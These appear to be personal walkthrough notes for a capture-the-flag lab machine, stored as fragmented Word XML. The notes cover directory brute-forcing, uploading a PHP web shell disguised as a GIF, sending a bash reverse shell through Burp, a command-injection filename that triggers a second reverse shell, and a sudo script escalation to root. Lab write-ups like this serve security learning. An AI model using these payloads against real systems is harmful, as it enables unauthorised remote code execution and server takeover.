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A26E9C4" w:rsidR="00843DCE" w:rsidRPr="005C6398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5C6398">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Networked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6074446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391C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91C1D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391C1D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391C1D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391C1D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391C1D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391C1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391C1D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55BA12EF" w:rsidR="00843DCE" w:rsidRDefault="003268F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4" w:history="1">
        <w:r w:rsidRPr="003F58DF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip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wordlists/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>/directory-list2.3-small.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7E3C0" w14:textId="19F4A097" w:rsidR="00597F45" w:rsidRDefault="00597F4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show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so edit it with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8F15C9" w14:textId="4927082A" w:rsidR="00597F45" w:rsidRDefault="00597F4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Gobuster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5" w:history="1">
        <w:r w:rsidRPr="003F58DF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip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wordlists/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dirbuster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/directory-list2.3-small.txt -x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</w:p>
    <w:p w14:paraId="79DE38FA" w14:textId="178554A1" w:rsidR="007251C0" w:rsidRDefault="007251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X = extension </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="5C2AC588" w:rsidR="00843DCE" w:rsidRDefault="0055785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the backup we can download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files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E71AE28" w14:textId="77777777" w:rsidR="00557852" w:rsidRDefault="00557852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521E30FB" w14:textId="07AD26E1" w:rsidR="00557852" w:rsidRDefault="0055785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After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analys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 file we notice that the </w:t>
      </w:r>
      <w:r w:rsidR="00656882">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file has only access .gif.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1641D43B" w14:textId="129245B8" w:rsidR="00656882" w:rsidRPr="00557852" w:rsidRDefault="0065688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shel.php.gif and upload it and done.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3712DBA" w14:textId="2462D914" w:rsidR="00656882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374B337F" w14:textId="6F50CFE3" w:rsidR="00656882" w:rsidRPr="00656882" w:rsidRDefault="0065688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the endpoint just upload shell.php.gif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3CC91AFF" w14:textId="0636513A" w:rsidR="005005D0" w:rsidRDefault="005005D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Offsec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use </w:t>
      </w:r>
      <w:r w:rsidR="006F49FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GIF8;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?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php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system($_GET[‘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bhavya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>]); ?&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00257794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6F49FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(GIF8 is necessary because of the code logic that in video try to cover but I don’t understand)</w:t>
      </w:r>
      <w:r w:rsidR="003C4852">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> then visit that image and .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C4852">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php.gif?bhavya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C4852"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 w:rsidR="003C4852"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 w:rsidR="003C4852">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtain request and in burp write bash -I &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C4852"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 w:rsidR="003C4852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="003C4852"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 w:rsidR="003C4852">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/9001 0&gt;&amp;1 with encode it and obtain shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8E754D" w14:textId="719003F6" w:rsidR="00253CA6" w:rsidRPr="006F49FE" w:rsidRDefault="00253CA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another youtuber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="295A2106" w:rsidR="00843DCE" w:rsidRDefault="00FC528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Upload that .gif image and run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4444 and open that image in new tab </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FFC954" w14:textId="77777777" w:rsidR="00FC5281" w:rsidRDefault="00FC528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**at user.txt not being visit by use for try to visit the files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ADB758" w14:textId="77777777" w:rsidR="00D668A0" w:rsidRDefault="00D668A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when we notice the files then we obtain that $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path$value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then shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B68727" w14:textId="77777777" w:rsidR="00D668A0" w:rsidRDefault="00D668A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after understand the logic we just add ; and write a shell as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582E35C" w14:textId="77777777" w:rsidR="00F83B95" w:rsidRDefault="00F83B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Pr="00F83B95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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> visit the location as cd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vae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/www/html/uploads/ and write </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5221B0" w14:textId="4CEB1555" w:rsidR="00F83B95" w:rsidRDefault="00F83B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touch ‘;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-c bash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5555’ and start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lisner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 terminal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lvnp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5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C554C30" w14:textId="6F58C10D" w:rsidR="007C222D" w:rsidRDefault="00F83B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here ;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brack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the code logic </w:t>
      </w:r>
      <w:r w:rsidR="00FC5281">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005C56BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>just wait if not then run ls -al at old shell and we obtain new shell</w:t>
      </w:r>
      <w:r w:rsidR="00FC5281">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005C56BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>then visit user.txt its perfect now.</w:t>
      </w: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6D838E04" w:rsidR="00843DCE" w:rsidRDefault="007C222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new shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F917ADD" w14:textId="5D96857E" w:rsidR="007C222D" w:rsidRDefault="007C222D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=&gt; to see this user has what root to be access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B5EC8" w14:textId="00B68BD5" w:rsidR="007C222D" w:rsidRDefault="007C222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notice that if we change 1 file with break logic then we obtain the root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B02CB" w14:textId="72F1C16C" w:rsidR="007C222D" w:rsidRDefault="007C222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notice that var=x so what we input it take.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038F1B68" w14:textId="2109BE40" w:rsidR="007C222D" w:rsidRDefault="007C222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So run the script as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3680C52A" w14:textId="2D7F5B50" w:rsidR="009D5095" w:rsidRDefault="009D50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bash /bin/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5FBAE0A" w14:textId="13956ECF" w:rsidR="009D5095" w:rsidRDefault="009D50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enter anything </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D3E17" w14:textId="5B51E1DD" w:rsidR="009D5095" w:rsidRDefault="009D50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sees its root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3360C121" w:rsidR="00843DCE" w:rsidRDefault="001A1CE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Just do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-l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>what we obtain copy and paste with cat and with the help of ssh we obtain root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>id (we see root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1174FD" w14:textId="77777777" w:rsidR="001A1CE0" w:rsidRDefault="001A1CE0" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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A1CE0"/>
    <w:rsid w:val="00253615"/>
    <w:rsid w:val="00253CA6"/>
    <w:rsid w:val="00257794"/>
    <w:rsid w:val="003268F0"/>
    <w:rsid w:val="00391C1D"/>
    <w:rsid w:val="003C4852"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004F31E1"/>
    <w:rsid w:val="005005D0"/>
    <w:rsid w:val="00557852"/>
    <w:rsid w:val="00597F45"/>
    <w:rsid w:val="005C56BB"/>
    <w:rsid w:val="005C6398"/>
    <w:rsid w:val="00656882"/>
    <w:rsid w:val="006F49FE"/>
    <w:rsid w:val="007251C0"/>
    <w:rsid w:val="007C222D"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="009D5095"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D668A0"/>
    <w:rsid w:val="00F45177"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F83B95"/>
    <w:rsid w:val="00FC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45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ip" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-10T16:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>